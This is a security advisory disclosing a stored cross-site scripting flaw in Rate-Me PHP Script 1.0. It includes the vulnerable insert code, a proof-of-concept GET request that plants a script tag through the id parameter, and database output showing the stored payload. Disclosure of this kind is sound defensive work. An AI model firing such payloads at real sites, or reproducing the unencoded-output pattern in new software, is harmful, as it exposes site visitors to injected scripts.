Rate-Me PHP Script version 1.0 suffers from a persistent cross site scripting vulnerability.
8338a75a2bf7a1853fae4cc63a786c9ce1a30c5f38748805e1e99c2cc4521e70
# Exploit Title: Rate-Me PHP Script Persistent Cross Site Scripting
# Disclosure Date: 11/11/2016
# Exploit Author: Boumediene KADDOUR a.k.a Sh311c0d3r
# Version: 1.0
# Application website: https://www.phpjabbers.com/free-rate-me-script/
# CVE : N/A
Vulnerability Details:
=====================
Rate-me php script suffers from a stored Cross Site Scripting which, An
attacker can inject JavaScript in the rate section and in particular
through the id field, where the injected script will be stored on the
database.
If a developer creates a webpage where authenticated or non authenticated
users can see the rate status, The script's triggered and the code's
executed on the client side.
[+] PoC
Vulnerable Code:
if ($_REQUEST["do"]=='rate') {
$sql = "INSERT INTO ".$SETTINGS["data_table"]." SET
date_time=now(),
rate_id='".mysql_real_escape_string($_REQUEST["id"])."',
rating='".mysql_real_escape_string($_REQUEST["rating"])."',
ip_address='".mysql_real_escape_string(get_client_ip())."'";
$sql_result = mysql_query ($sql, $connection ) or die ('request
"Could not execute SQL query" '.$sql);
echo 'Thank you';
exit;
}
Payload:
GET
/Rate-Me/rate-me.php?do=rate&id=<script>alert("StoredXSS")</script>&rating=1&1478894713054
HTTP/1.1
Host: 192.168.43.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.237/Rate-Me/example-page.html
Connection: keep-alive
Database output:
mysql> select * from rateme where id=19;
+----+-------------------------------------------------+---------+-----------------------------------------+------------------------+
| id | rate_id | rating |
date_time | ip_address
|
+----
+------------------------------------------------+---------+------------------------------------------+-----------------------+
| 19 | <script>alert("StoredXSS")</script> | 1 |
2016-11-11 15:05:30 | 192.168.43.237 |
+----+-------------------------------------------------+---------+------------+----------------------------+------------------------+
1 row in set (0.00 sec)
sh311c0d3r